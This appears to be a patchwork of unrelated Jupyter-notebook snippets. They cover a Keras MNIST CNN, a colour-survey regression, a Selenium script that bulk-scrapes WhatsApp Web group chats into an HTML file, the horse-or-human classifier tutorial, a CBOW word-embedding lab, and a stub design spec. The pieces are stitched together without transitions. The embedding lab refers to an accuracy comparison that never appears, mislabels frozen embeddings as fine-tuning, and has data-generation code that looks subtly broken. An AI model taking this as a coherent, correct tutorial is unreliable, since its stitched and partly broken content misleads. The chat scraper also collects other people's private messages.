Let's display the architecture of our model so far.
```
model.summary()
```
Above, the output of every Conv2D and MaxPooling2D layer is a 3D tensor of shape (height, width, channels). The height and width dimensions tend to shrink as we go deeper in the network. The number of output channels for each Conv2D layer is controlled by its first argument (e.g., 32 or 64). Typically, as the height and width shrink, we can afford (computationally) to add more output channels in each Conv2D layer.
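The shrinking heights and widths follow directly from the layer arithmetic: each 3×3 'valid' convolution removes 2 from a spatial dimension, and each 2×2 max pool halves it (with integer division). A quick pure-Python check of the shapes reported by `model.summary()`:

```python
def conv_out(n, k=3):
    # 'valid' convolution: no padding, stride 1
    return n - k + 1

def pool_out(n, p=2):
    # 2x2 max pooling halves each spatial dimension (floor)
    return n // p

size = 28  # MNIST input height/width
for layer in ("conv", "pool", "conv", "pool", "conv"):
    size = conv_out(size) if layer == "conv" else pool_out(size)
    print(layer, size)  # 26, 13, 11, 5, 3
```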
### Add Dense layers on top
To complete the model, we will feed the last output tensor from the convolutional base (of shape (3, 3, 64)) into one or more Dense layers to perform classification. Dense layers take vectors (1D) as input, while the current output is a 3D tensor. So first we will flatten the 3D output to 1D, then add one or more Dense layers on top. MNIST has 10 classes, so we use a final Dense layer with 10 outputs and a softmax activation.
```
model.add(layers.Flatten())
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(10, activation='softmax'))
```
Here's the complete architecture of our model.
```
model.summary()
```
As you can see here, the (3, 3, 64) output is flattened into a vector of shape (576) before passing through the two Dense layers.
### Compile and train the model
```
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(train_images, train_labels, epochs=5)
```
### Evaluate the model
```
test_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)
print(test_acc)
```
As the results show, our simple CNN achieves a test accuracy of 99%. Not bad for a few lines of code! For another way to build a CNN (using the Keras Subclassing API and GradientTape), see [here](https://github.com/tensorflow/docs-l10n/blob/master/site/ko/tutorials/quickstart/advanced.ipynb).
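As a rough illustration of that subclassing style (a sketch only, not the linked tutorial's exact code — the class name and layer sizes here are made up):

```python
import tensorflow as tf

class SmallCNN(tf.keras.Model):
    """A minimal subclassed CNN, analogous in spirit to the Sequential model above."""
    def __init__(self):
        super(SmallCNN, self).__init__()
        self.conv = tf.keras.layers.Conv2D(32, 3, activation='relu')
        self.pool = tf.keras.layers.MaxPooling2D()
        self.flatten = tf.keras.layers.Flatten()
        self.d1 = tf.keras.layers.Dense(64, activation='relu')
        self.d2 = tf.keras.layers.Dense(10, activation='softmax')

    def call(self, x):
        # Forward pass: conv block, then the classification head
        x = self.pool(self.conv(x))
        return self.d2(self.d1(self.flatten(x)))
```

A subclassed model can then be trained either with `model.fit` after compiling, or with a custom `tf.GradientTape` loop.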
```
import sqlite3
import numpy as np
import colorspacious
from sklearn import linear_model
ALL_NUM_COLORS = [6, 8, 10]
DB_FILE = "../survey-results/results.db"
def to_rgb_jab(color):
"""
Convert hex color code (without `#`) to sRGB255 and CAM02-UCS.
"""
rgb = [(int(i[:2], 16), int(i[2:4], 16), int(i[4:], 16)) for i in color]
jab = [colorspacious.cspace_convert(i, "sRGB255", "CAM02-UCS") for i in rgb]
return np.array(rgb), np.array(jab)
# Load survey data
data_rgb = {}
data_jab = {}
targets = {}
min_count = 1e10
conn = sqlite3.connect(DB_FILE)
c = conn.cursor()
for num_colors in ALL_NUM_COLORS:
count = 0
data_jab[num_colors] = []
data_rgb[num_colors] = []
targets[num_colors] = []
for row in c.execute(
f"SELECT c1, c2, sp FROM picks WHERE length(c1) = {num_colors * 7 - 1}"
):
count += 1
# Convert to Jab [CAM02-UCS based]
rgb1, jab1 = to_rgb_jab(row[0].split(","))
rgb2, jab2 = to_rgb_jab(row[1].split(","))
# Add to data arrays
data_rgb[num_colors].append(np.array((rgb1, rgb2)).flatten())
data_jab[num_colors].append(np.array((jab1, jab2)).flatten())
targets[num_colors].append(row[2] - 1)
data_rgb[num_colors] = np.array(data_rgb[num_colors])
data_jab[num_colors] = np.array(data_jab[num_colors])
targets[num_colors] = np.array(targets[num_colors])
min_count = min(min_count, count)
print(num_colors, count)
conn.close()
stats1 = {}
stats2 = {}
stats = [np.mean, np.min, np.max]
for stat in stats:
stats1["c" + stat.__name__] = np.array([])
stats2["c" + stat.__name__] = np.array([])
for stat in stats:
stats1["l" + stat.__name__] = np.array([])
stats2["l" + stat.__name__] = np.array([])
for nc in ALL_NUM_COLORS:
tmp1 = data_jab[nc][:, : nc * 3].reshape((data_jab[nc].shape[0], nc, 3))
tmp2 = data_jab[nc][:, nc * 3 :].reshape((data_jab[nc].shape[0], nc, 3))
for stat in stats:
c1 = stat(np.sqrt(tmp1[:, :, 1] ** 2 + tmp1[:, :, 2] ** 2), axis=1)
c2 = stat(np.sqrt(tmp2[:, :, 1] ** 2 + tmp2[:, :, 2] ** 2), axis=1)
stats1["c" + stat.__name__] = np.append(stats1["c" + stat.__name__], c1)
stats2["c" + stat.__name__] = np.append(stats2["c" + stat.__name__], c2)
print(
f" {stat.__name__} chroma {nc:2d}: {np.mean((c1 > c2) ^ targets[nc]):.3f}"
)
l1 = stat(tmp1[:, :, 0], axis=1)
l2 = stat(tmp2[:, :, 0], axis=1)
stats1["l" + stat.__name__] = np.append(stats1["l" + stat.__name__], l1)
stats2["l" + stat.__name__] = np.append(stats2["l" + stat.__name__], l2)
print(
f"{stat.__name__} lightness {nc:2d}: {np.mean((l1 > l2) ^ targets[nc]):.3f}"
)
reg = linear_model.LinearRegression()
tmp = (np.array(list(stats1.values())) - np.array(list(stats2.values()))).T
reg.fit(tmp, np.concatenate(list(targets.values())))
coef_sum = np.sum(np.abs(reg.coef_))
print("coefficient fractions:")
for i, k in enumerate(stats1.keys()):
print(k, f"{reg.coef_[i] / coef_sum:6.3f}")
print(
f"\naccuracy:\n{np.mean((reg.predict(tmp) < 0.5) ^ np.concatenate(list(targets.values()))):.3f}"
)
print(
f"accuracy 6: {np.mean((reg.predict(tmp[:targets[6].size]) < 0.5) ^ targets[6]):.3f}"
)
print(
f"accuracy 8: {np.mean((reg.predict(tmp[targets[6].size:targets[6].size + targets[8].size]) < 0.5) ^ targets[8]):.3f}"
)
print(
f"accuracy 10: {np.mean((reg.predict(tmp[-targets[10].size:]) < 0.5) ^ targets[10]):.3f}"
)
```
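As a side note, the `c`-statistics computed above treat chroma as the Euclidean norm of the a–b components of CAM02-UCS. A minimal numpy check with made-up Jab values:

```python
import numpy as np

# Two hypothetical colors in (J, a, b) coordinates
jab = np.array([[50.0, 3.0, 4.0],
                [60.0, 0.0, 5.0]])
chroma = np.sqrt(jab[:, 1] ** 2 + jab[:, 2] ** 2)
print(chroma)  # [5. 5.]
```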
```
import selenium
from selenium import webdriver
from selenium.webdriver.common import keys
from time import sleep
import os
os.environ['PATH'] += ':.'
os.environ['DISPLAY'] = ':0'
options = webdriver.ChromeOptions()
for i in ('--disable-extensions', '--disable-dev-shm-usage', "--no-sandbox", "user-data-dir=/tmp/"
):
options.add_argument(i)
driver = webdriver.Chrome(options=options, executable_path='./chromedriver')
driver.get('http://web.whatsapp.com')
# signed_in = driver.find_elements_by_xpath("//*[contains(text(), 'Keep me')]")[0]
# signed_in.click()
print("CONFIRM THE QR CODE, THEN CLICK ON THE CHAT OF THE GROUP YOU WANT TO CRAWL!")
sleep(1)
def get_chat_area():
body = driver.find_element_by_tag_name('body')
chat_area_father = body.find_element_by_class_name('copyable-area')
chat_area = chat_area_father.find_element_by_xpath('div[1]') # get 1st div child
chat_area.get_attribute('class')
return chat_area, body
chat_area, body = get_chat_area()
chat_area
messages = driver.find_elements_by_class_name('message-in')
len(messages)
def sleep_until_messages_loaded(body):
for i in range(10):
try: body.find_element_by_xpath('//div[contains(@title, "loading messages")]')
except selenium.common.exceptions.NoSuchElementException: return True
sleep(0.5)
return False
els = []  # accumulated raw HTML of the harvested message elements
sleep_until_messages_loaded(body)
driver.execute_script('''
function _x(STR_XPATH) {
var xresult = document.evaluate(STR_XPATH, document, null, XPathResult.ANY_TYPE, null);
var xnodes = [];
var xres;
while (xres = xresult.iterateNext()) {
xnodes.push(xres);
}
return xnodes;
}
window._x = _x;
''')
xpath = '//div[contains(@class, "message-in")]|//div[contains(@class, "message-out")]'
driver.execute_script(f'''
return _.map(_x('{xpath}'), x => x)
''')
def get_msgs():
removed_els = driver.execute_script('''
return _.map(_x('%s').slice(5,100000)
,x => {
if(x) {a = x.outerHTML; x.remove(); return a} else {return null}
})
''' % xpath)
removed_els.reverse()
return removed_els
get_msgs()
# Harvest messages while paging up through the chat history
chat_area, _ = get_chat_area()
chat_area.click()  # try to click an area without conflicting elements
for i in range(150):
els += get_msgs()
[body.send_keys(keys.Keys.PAGE_UP) for _ in range(5)]
sleep(0.5)
sleep_until_messages_loaded(body)
print(i, flush=True, end=',')
#if (i % 10) == 0: chat_area.click(), print()
print('\n Length');
print(len(els))
import copy
import settings
FILENAME = settings.GROUP_NAME + '.html'
r_els = copy.copy(els)
r_els.reverse()
with open(FILENAME, 'w+') as f:
f.writelines(r_els)
print(f'{FILENAME} written!')
```
## Extras
```
############## Extras ##############
import base64
def get_blob_content(driver, uri) -> bytes:
"""
Use to grab files such as images from blob links
get_blob_content("blob:https://web.whatsapp.com/cf8679c6-e3cb-4a30-91ed-3a67de1d5dd4")
"""
result = driver.execute_async_script("""
var uri = arguments[0];
var callback = arguments[1];
var toBase64 = function(buffer){for(var r,n=new Uint8Array(buffer),t=n.length,a=new Uint8Array(4*Math.ceil(t/3)),i=new Uint8Array(64),o=0,c=0;64>c;++c)i[c]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charCodeAt(c);for(c=0;t-t%3>c;c+=3,o+=4)r=n[c]<<16|n[c+1]<<8|n[c+2],a[o]=i[r>>18],a[o+1]=i[r>>12&63],a[o+2]=i[r>>6&63],a[o+3]=i[63&r];return t%3===1?(r=n[t-1],a[o]=i[r>>2],a[o+1]=i[r<<4&63],a[o+2]=61,a[o+3]=61):t%3===2&&(r=(n[t-2]<<8)+n[t-1],a[o]=i[r>>10],a[o+1]=i[r>>4&63],a[o+2]=i[r<<2&63],a[o+3]=61),new TextDecoder("ascii").decode(a)};
var xhr = new XMLHttpRequest();
xhr.responseType = 'arraybuffer';
xhr.onload = function(){ callback(toBase64(xhr.response)) };
xhr.onerror = function(){ callback(xhr.status) };
xhr.open('GET', uri);
xhr.send();
""", uri)
if type(result) == int :
raise Exception("Request failed with status %s" % result)
return base64.b64decode(result)
def bind(instance, func, asname):
setattr(instance, asname, func.__get__(instance, instance.__class__))
def bind_driver(driver):
bind(driver, get_blob_content, 'get_blob_content')
def display_image(data):
    from IPython.display import Image
    with open('/tmp/a.jpg', 'wb') as f: f.write(data)
    return Image('/tmp/a.jpg')  # return the Image so the notebook renders it
```
```
```
!wget --no-check-certificate \
https://storage.googleapis.com/laurencemoroney-blog.appspot.com/horse-or-human.zip \
-O /tmp/horse-or-human.zip
```
The following Python code uses the `os` library to access the file system, and the `zipfile` library to unzip the data.
```
import os
import zipfile
local_zip = '/tmp/horse-or-human.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('/tmp/horse-or-human')
zip_ref.close()
```
The contents of the .zip are extracted to the base directory `/tmp/horse-or-human`, which contains `horses` and `humans` subdirectories.
In short: The training set is the data that is used to tell the neural network model that 'this is what a horse looks like', 'this is what a human looks like' etc.
One thing to pay attention to in this sample: We do not explicitly label the images as horses or humans. If you remember with the handwriting example earlier, we had labelled 'this is a 1', 'this is a 7' etc. Later you'll see something called an ImageGenerator being used -- and this is coded to read images from subdirectories, and automatically label them from the name of that subdirectory. So, for example, you will have a 'training' directory containing a 'horses' directory and a 'humans' one. ImageGenerator will label the images appropriately for you, reducing a coding step.
Let's define each of these directories:
```
# Directory with our training horse pictures
train_horse_dir = os.path.join('/tmp/horse-or-human/horses')
# Directory with our training human pictures
train_human_dir = os.path.join('/tmp/horse-or-human/humans')
```
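The subdirectory-based labeling described above can be sketched in plain Python. This is a simplified stand-in for what the ImageGenerator does, and `label_from_directory` is a made-up helper name, not a Keras API:

```python
import os

def label_from_directory(root):
    """Pair each file under root/<class>/ with a class index derived
    from its subdirectory name (e.g. horses -> 0, humans -> 1)."""
    classes = sorted(os.listdir(root))
    class_index = {name: i for i, name in enumerate(classes)}
    samples = []
    for name in classes:
        class_dir = os.path.join(root, name)
        for fname in sorted(os.listdir(class_dir)):
            samples.append((os.path.join(class_dir, fname), class_index[name]))
    return samples, class_index
```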
Now, let's see what the filenames look like in the `horses` and `humans` training directories:
```
train_horse_names = os.listdir(train_horse_dir)
print(train_horse_names[:10])
train_human_names = os.listdir(train_human_dir)
print(train_human_names[:10])
```
Let's find out the total number of horse and human images in the directories:
```
print('total training horse images:', len(os.listdir(train_horse_dir)))
print('total training human images:', len(os.listdir(train_human_dir)))
```
Now let's take a look at a few pictures to get a better sense of what they look like. First, configure the matplotlib parameters:
```
%matplotlib inline
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# Parameters for our graph; we'll output images in a 4x4 configuration
nrows = 4
ncols = 4
# Index for iterating over images
pic_index = 0
```
Now, display a batch of 8 horse and 8 human pictures. You can rerun the cell to see a fresh batch each time:
```
# Set up matplotlib fig, and size it to fit 4x4 pics
fig = plt.gcf()
fig.set_size_inches(ncols * 4, nrows * 4)
pic_index += 8
next_horse_pix = [os.path.join(train_horse_dir, fname)
for fname in train_horse_names[pic_index-8:pic_index]]
next_human_pix = [os.path.join(train_human_dir, fname)
for fname in train_human_names[pic_index-8:pic_index]]
for i, img_path in enumerate(next_horse_pix+next_human_pix):
# Set up subplot; subplot indices start at 1
sp = plt.subplot(nrows, ncols, i + 1)
sp.axis('Off') # Don't show axes (or gridlines)
img = mpimg.imread(img_path)
plt.imshow(img)
plt.show()
```
## Building a Small Model from Scratch
But before we continue, let's start defining the model:
Step 1 will be to import tensorflow.
```
import tensorflow as tf
```
We then add convolutional layers as in the previous example, and flatten the final result to feed into the densely connected layers.
Finally we add the densely connected layers.
Note that because we are facing a two-class classification problem, i.e. a *binary classification problem*, we will end our network with a [*sigmoid* activation](https://wikipedia.org/wiki/Sigmoid_function), so that the output of our network will be a single scalar between 0 and 1, encoding the probability that the current image is class 1 (as opposed to class 0).
```
model = tf.keras.models.Sequential([
    # Note the input shape is the desired size of the image 300x300 with 3 bytes color
    # This is the first convolution
    tf.keras.layers.Conv2D(16, (3, 3), activation='relu', input_shape=(300, 300, 3)),
    tf.keras.layers.MaxPooling2D(2, 2),
    # The second convolution
    tf.keras.layers.Conv2D(32, (3, 3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2, 2),
    # The third convolution
    tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2, 2),
    # The fourth convolution
    tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2, 2),
    # The fifth convolution
    tf.keras.layers.Conv2D(64, (3, 3), activation='relu'),
    tf.keras.layers.MaxPooling2D(2, 2),
    # Flatten the results to feed into a DNN
    tf.keras.layers.Flatten(),
    # 512 neuron hidden layer
    tf.keras.layers.Dense(512, activation='relu'),
    # Only 1 output neuron. It will contain a value from 0-1, where 0 means one class
    # ('horses') and 1 means the other ('humans')
    tf.keras.layers.Dense(1, activation='sigmoid')
])
```
The `model.summary()` method call prints a summary of the network:
```
model.summary()
```
The "output shape" column shows how the size of your feature map evolves in each successive layer. The convolution layers trim the feature maps slightly because no padding is used ('valid' convolutions), and each pooling layer halves the dimensions.
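You can verify this size evolution by hand: each unpadded 3x3 convolution trims 2 pixels from each spatial dimension, and each 2x2 max-pool floor-divides it by 2. A small sketch, assuming the 300x300 input and the five conv/pool pairs of the model above:
```
def conv_out(size, kernel=3):
    # 'valid' (unpadded) convolution trims kernel-1 pixels
    return size - kernel + 1

def pool_out(size, pool=2):
    # Max pooling floor-divides the spatial size
    return size // pool

size = 300  # input height/width
trace = [size]
for _ in range(5):  # five conv + pool pairs, as in the model
    size = pool_out(conv_out(size))
    trace.append(size)
```
The trace comes out as 300, 149, 73, 35, 16, 7, so the flattened feature vector feeding the dense layers has 7 * 7 * 64 = 3136 entries.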
Next, we'll configure the specifications for model training. We will train our model with the `binary_crossentropy` loss, because it's a binary classification problem and our final activation is a sigmoid. (For a refresher on loss metrics, see the [Machine Learning Crash Course](https://developers.google.com/machine-learning/crash-course/descending-into-ml/video-lecture).) We will use the `rmsprop` optimizer with a learning rate of `0.001`. During training, we will want to monitor classification accuracy.
**NOTE**: In this case, using the [RMSprop optimization algorithm](https://wikipedia.org/wiki/Stochastic_gradient_descent#RMSProp) is preferable to [stochastic gradient descent](https://developers.google.com/machine-learning/glossary/#SGD) (SGD), because RMSprop automates learning-rate tuning for us. (Other optimizers, such as [Adam](https://wikipedia.org/wiki/Stochastic_gradient_descent#Adam) and [Adagrad](https://developers.google.com/machine-learning/glossary/#AdaGrad), also automatically adapt the learning rate during training, and would work equally well here.)
```
from tensorflow.keras.optimizers import RMSprop
model.compile(loss='binary_crossentropy',
              optimizer=RMSprop(learning_rate=0.001),
              metrics=['acc'])
```
### Data Preprocessing
Let's set up data generators that will read pictures in our source folders, convert them to `float32` tensors, and feed them (with their labels) to our network. We'll have one generator for the training images and one for the validation images. Our generators will yield batches of images of size 300x300 and their labels (binary).
As you may already know, data that goes into neural networks should usually be normalized in some way to make it more amenable to processing by the network. (It is uncommon to feed raw pixels into a convnet.) In our case, we will preprocess our images by normalizing the pixel values to be in the `[0, 1]` range (originally all values are in the `[0, 255]` range).
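That rescaling is just an element-wise division; a minimal sketch with a made-up pixel array:
```
import numpy as np

# A hypothetical 2x2 RGB image with raw uint8 pixel values in [0, 255]
raw = np.array([[[0, 128, 255]] * 2] * 2, dtype=np.uint8)

# The same rescaling that ImageDataGenerator(rescale=1/255) applies per pixel
scaled = raw.astype(np.float32) / 255.0
```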
In Keras this can be done via the `keras.preprocessing.image.ImageDataGenerator` class using the `rescale` parameter. This `ImageDataGenerator` class allows you to instantiate generators of augmented image batches (and their labels) via `.flow(data, labels)` or `.flow_from_directory(directory)`. These generators can then be used with the Keras model methods that accept data generators as inputs: `fit_generator`, `evaluate_generator`, and `predict_generator`.
```
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# All images will be rescaled by 1./255
train_datagen = ImageDataGenerator(rescale=1/255)
# Flow training images in batches of 128 using train_datagen generator
train_generator = train_datagen.flow_from_directory(
    '/tmp/horse-or-human/',  # This is the source directory for training images
    target_size=(300, 300),  # All images will be resized to 300x300
    batch_size=128,
    # Since we use binary_crossentropy loss, we need binary labels
    class_mode='binary')
```
### Training
Let's train for 15 epochs -- this may take a few minutes to run.
Do note the values per epoch.
The loss and accuracy are a good indication of training progress: the model makes a guess at the classification of each training example, measures it against the known label, and computes the loss. Accuracy is the fraction of correct guesses.
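As a sketch of that bookkeeping, with made-up sigmoid outputs and labels:
```
import numpy as np

# Hypothetical sigmoid outputs and true binary labels
preds = np.array([0.9, 0.2, 0.7, 0.4])
labels = np.array([1, 0, 0, 0])

guesses = (preds > 0.5).astype(int)   # apply the 0.5 decision threshold
accuracy = float(np.mean(guesses == labels))
```
Here one of the four thresholded guesses is wrong, so the accuracy is 0.75.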
```
history = model.fit_generator(
    train_generator,
    steps_per_epoch=8,
    epochs=15,
    verbose=1)
```
### Running the Model
Let's now take a look at actually running a prediction using the model. This code will allow you to choose 1 or more files from your file system, it will then upload them, and run them through the model, giving an indication of whether the object is a horse or a human.
```
import numpy as np
from google.colab import files
from keras.preprocessing import image
uploaded = files.upload()
for fn in uploaded.keys():
    # predicting images
    path = '/content/' + fn
    img = image.load_img(path, target_size=(300, 300))
    x = image.img_to_array(img)
    x = np.expand_dims(x, axis=0)
    images = np.vstack([x])
    classes = model.predict(images, batch_size=10)
    print(classes[0])
    if classes[0] > 0.5:
        print(fn + " is a human")
    else:
        print(fn + " is a horse")
```
### Visualizing Intermediate Representations
To get a feel for what kind of features our convnet has learned, one fun thing to do is to visualize how an input gets transformed as it goes through the convnet.
Let's pick a random image from the training set, and then generate a figure where each row is the output of a layer, and each image in the row is a specific filter in that output feature map. Rerun this cell to generate intermediate representations for a variety of training images.
```
import numpy as np
import random
from tensorflow.keras.preprocessing.image import img_to_array, load_img
# Let's define a new Model that will take an image as input, and will output
# intermediate representations for all layers in the previous model after
# the first.
successive_outputs = [layer.output for layer in model.layers[1:]]
#visualization_model = Model(img_input, successive_outputs)
visualization_model = tf.keras.models.Model(inputs = model.input, outputs = successive_outputs)
# Let's prepare a random input image from the training set.
horse_img_files = [os.path.join(train_horse_dir, f) for f in train_horse_names]
human_img_files = [os.path.join(train_human_dir, f) for f in train_human_names]
img_path = random.choice(horse_img_files + human_img_files)
img = load_img(img_path, target_size=(300, 300))  # this is a PIL image
x = img_to_array(img)          # Numpy array with shape (300, 300, 3)
x = x.reshape((1,) + x.shape)  # Numpy array with shape (1, 300, 300, 3)
# Rescale by 1/255
x /= 255
# Let's run our image through our network, thus obtaining all
# intermediate representations for this image.
successive_feature_maps = visualization_model.predict(x)
# These are the names of the layers, so can have them as part of our plot
layer_names = [layer.name for layer in model.layers]
# Now let's display our representations
for layer_name, feature_map in zip(layer_names, successive_feature_maps):
    if len(feature_map.shape) == 4:
        # Just do this for the conv / maxpool layers, not the fully-connected layers
        n_features = feature_map.shape[-1]  # number of features in feature map
        # The feature map has shape (1, size, size, n_features)
        size = feature_map.shape[1]
        # We will tile our images in this matrix
        display_grid = np.zeros((size, size * n_features))
        for i in range(n_features):
            # Postprocess the feature to make it visually palatable
            x = feature_map[0, :, :, i]
            x -= x.mean()
            x /= x.std()
            x *= 64
            x += 128
            x = np.clip(x, 0, 255).astype('uint8')
            # We'll tile each filter into this big horizontal grid
            display_grid[:, i * size : (i + 1) * size] = x
        # Display the grid
        scale = 20. / n_features
        plt.figure(figsize=(scale * n_features, scale))
        plt.title(layer_name)
        plt.grid(False)
        plt.imshow(display_grid, aspect='auto', cmap='viridis')
```
As you can see, we go from the raw pixels of the images to increasingly abstract and compact representations. The representations downstream start highlighting what the network pays attention to, and they show fewer and fewer features being "activated"; most are set to zero. This is called "sparsity." Representation sparsity is a key feature of deep learning.
These representations carry increasingly less information about the original pixels of the image, but increasingly refined information about the class of the image. You can think of a convnet (or a deep network in general) as an information distillation pipeline.
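The sparsity claim is easy to illustrate: applying a ReLU to activations centred on zero zeroes out roughly half of them. A toy measurement with synthetic Gaussian activations, not real feature maps:
```
import numpy as np

rng = np.random.default_rng(0)
pre_activations = rng.normal(size=10_000)  # symmetric around 0
relu_out = np.maximum(pre_activations, 0)  # ReLU zeroes all negatives

sparsity = float(np.mean(relu_out == 0))   # fraction of dead activations
```
Deeper layers typically show even higher sparsity than this symmetric toy case.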
## Clean Up
Before running the next exercise, run the following cell to terminate the kernel and free memory resources:
```
import os, signal
os.kill(os.getpid(), signal.SIGKILL)
```
---
```
import sys
import numpy as np
np.random.seed(42)
import keras.backend as K
from keras.models import Sequential
from keras.layers import Dense, Embedding, Lambda
from keras.utils import np_utils
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
from keras.initializers import Constant
import pandas as pd
import gensim
# In case your sys.path does not contain the base repo, cd there.
print(sys.path)
%cd '~/ml-solr-course'
path = 'dataset/docv2_train_queries.tsv'
queries = pd.read_csv(path, sep='\t', lineterminator='\r', names=['query_id', 'query'])[:20000]
queries.head()
corpus = [sentence for sentence in queries['query'].values if type(sentence) == str and len(sentence.split(' ')) >= 3]
# We load the pretrained embedding
path_to_glove_file = "./dataset/glove.6B.100d.txt"
embeddings_index = {}
with open(path_to_glove_file) as f:
    for line in f:
        word, coefs = line.split(maxsplit=1)
        coefs = np.fromstring(coefs, "f", sep=" ")
        embeddings_index[word] = coefs
print("Found %s word vectors." % len(embeddings_index))
tokenizer = Tokenizer()
tokenizer.fit_on_texts(corpus)
corpus = tokenizer.texts_to_sequences(corpus)
nb_samples = sum(len(s) for s in corpus)
V = len(tokenizer.word_index) + 1
dim = 100
window_size = 3
epochs=50
batch_size = 5000
BATCH = False
print(f'First 5 corpus items are {corpus[:5]}')
print(f'Length of corpus is {len(corpus)}')
```
Now comes the interesting part, we need to construct a matrix of `V+1 x dim` and for each word in the tokenizer, try to get it from the embedding. If it doesn't exist then just fill it with zeros.
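As a self-contained sketch of that lookup-with-fallback pattern, with a hypothetical two-word pretrained index (the real notebook uses the GloVe index and the fitted tokenizer):
```
import numpy as np

dim = 3                                        # toy dimension (the notebook uses 100)
embeddings_index = {"cat": np.ones(dim),       # hypothetical pretrained vectors
                    "dog": np.full(dim, 2.0)}
word_index = {"cat": 1, "dog": 2, "fish": 3}   # tokenizer-style, indices start at 1

embedding_matrix = np.zeros((len(word_index) + 2, dim))  # V + 1 rows, row 0 = padding
hits = misses = 0
for word, i in word_index.items():
    vector = embeddings_index.get(word)        # None for out-of-vocabulary words
    if vector is not None:
        embedding_matrix[i] = vector
        hits += 1
    else:
        misses += 1                            # the row stays all-zeros
```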
```
num_tokens = V + 1
hits = 0
misses = 0
# Prepare embedding matrix
embedding_matrix = np.zeros((num_tokens, dim))
for word, i in tokenizer.word_index.items():
    # Get the embedding vector from the GloVe embedding (None if the word is missing)
    embedding_vector = embeddings_index.get(word)
    if embedding_vector is not None:
        embedding_matrix[i] = embedding_vector
        hits += 1
    else:
        # Words not found in the embedding index will be all-zeros.
        # This includes the representation for "padding" and "OOV"
        misses += 1
print("Converted %d words (%d misses)" % (hits, misses))
```
```
cbow = Sequential()
# The same Embedding as before, but its initializer is the embedding matrix we
# built, with trainable=False, so we start from the pretrained embedding.
cbow.add(Embedding(input_dim=num_tokens, output_dim=dim,
                   embeddings_initializer=Constant(embedding_matrix),
                   input_length=window_size * 2, trainable=False))
cbow.add(Lambda(lambda x: K.mean(x, axis=1), output_shape=(dim,)))
cbow.add(Dense(V, activation='softmax'))
cbow.compile(loss='categorical_crossentropy', optimizer='adam')
cbow.summary()
```
Notice the non-trainable parameters! We are only training the softmax layer on top of fixed, pretrained embeddings. This is called fine-tuning on top of the embedding.
```
def generate_data(corpus, window_size, V, batch_size=batch_size):
    number_of_batches = (len(corpus) // batch_size) + 1
    for batch in range(number_of_batches):
        lower_end = batch * batch_size
        upper_end = (batch + 1) * batch_size if batch + 1 < number_of_batches else len(corpus)
        mini_batch_size = upper_end - lower_end
        maxlen = window_size * 2
        X = np.zeros((mini_batch_size, maxlen))
        Y = np.zeros((mini_batch_size, V))
        for query_id, words in enumerate(corpus[lower_end:upper_end]):
            L = len(words)
            for index, word in enumerate(words):
                contexts = []
                labels = []
                s = index - window_size
                e = index + window_size + 1
                contexts.append([words[i] for i in range(s, e) if 0 <= i < L and i != index])
                labels.append(word)
                x = sequence.pad_sequences(contexts, maxlen=maxlen)
                y = np_utils.to_categorical(labels, V)
                X[query_id] = x
                Y[query_id] = y
        yield (X, Y)
# If data is small, you can just generate the whole dataset and load it in memory to use the fit method
#
if not BATCH:
    def generate_data(corpus, window_size, V):
        maxlen = window_size * 2
        X = np.zeros((len(corpus), maxlen))
        Y = np.zeros((len(corpus), V))
        for query_id, words in enumerate(corpus):
            L = len(words)
            for index, word in enumerate(words):
                contexts = []
                labels = []
                s = index - window_size
                e = index + window_size + 1
                contexts.append([words[i] for i in range(s, e) if 0 <= i < L and i != index])
                labels.append(word)
                x = sequence.pad_sequences(contexts, maxlen=maxlen)
                y = np_utils.to_categorical(labels, V)
                X[query_id] = x
                Y[query_id] = y
        return (X, Y)
def fit_model():
    if not BATCH:
        X, Y = generate_data(corpus, window_size, V)
        print(f'Size of X is {X.shape} and Y is {Y.shape}')
        cbow.fit(X, Y, epochs=epochs)
    else:
        index = 1
        for x, y in generate_data(corpus, window_size, V):
            print(f'Training on Iteration: {index}')
            index += 1
            history = cbow.train_on_batch(x, y, reset_metrics=False, return_dict=True)
            print(history)

fit_model()

with open('./1-synonyms/lab2/vectors.txt', 'w') as f:
    f.write('{} {}\n'.format(V - 1, dim))
    vectors = cbow.get_weights()[0]
    for word, i in tokenizer.word_index.items():
        str_vec = ' '.join(map(str, list(vectors[i, :])))
        f.write('{} {}\n'.format(word, str_vec))
w2v = gensim.models.KeyedVectors.load_word2vec_format('./1-synonyms/lab2/vectors.txt', binary=False)
w2v.most_similar(positive=['gasoline'])
w2v.most_similar(positive=['grape'])
```
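The context-window construction used inside `generate_data` can be isolated into a pure-Python sketch (the token ids here are made up):
```
def context_window(words, index, window_size):
    # Token ids within +/- window_size of position `index`, excluding the word itself
    L = len(words)
    s, e = index - window_size, index + window_size + 1
    return [words[i] for i in range(s, e) if 0 <= i < L and i != index]

tokens = [11, 22, 33, 44, 55]                          # a hypothetical tokenized query
ctx_middle = context_window(tokens, 2, window_size=1)  # neighbours of 33
ctx_edge = context_window(tokens, 0, window_size=2)    # window clipped at the start
```
At the edges of a query the window is clipped, which is why the contexts are padded to `window_size * 2` before training.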
Do you notice the difference in the accuracy? For any task first search if there are any pretrained models to use!
---
# Functional Design:
### 1. Predict the availability of solar and wind energy at various time and location in the future.
#### 1.1. Input a specific time and location.
**Component Design:**
1. function name: get_location_and_time()
2. take the input: DD/MM/YY, zipcode
3. if the input is wrong, output an error message
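A minimal sketch of what `get_location_and_time()` could look like; the DD/MM/YY parsing and the 5-digit zipcode check are assumptions taken from the spec above:
```
from datetime import datetime

def get_location_and_time(date_str, zipcode):
    """Parse a 'DD/MM/YY' date and a 5-digit zipcode; raise ValueError on bad input."""
    try:
        when = datetime.strptime(date_str, "%d/%m/%y")
    except ValueError:
        raise ValueError(f"error: '{date_str}' is not a valid DD/MM/YY date")
    if not (zipcode.isdigit() and len(zipcode) == 5):
        raise ValueError(f"error: '{zipcode}' is not a valid 5-digit zipcode")
    return when, zipcode
```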
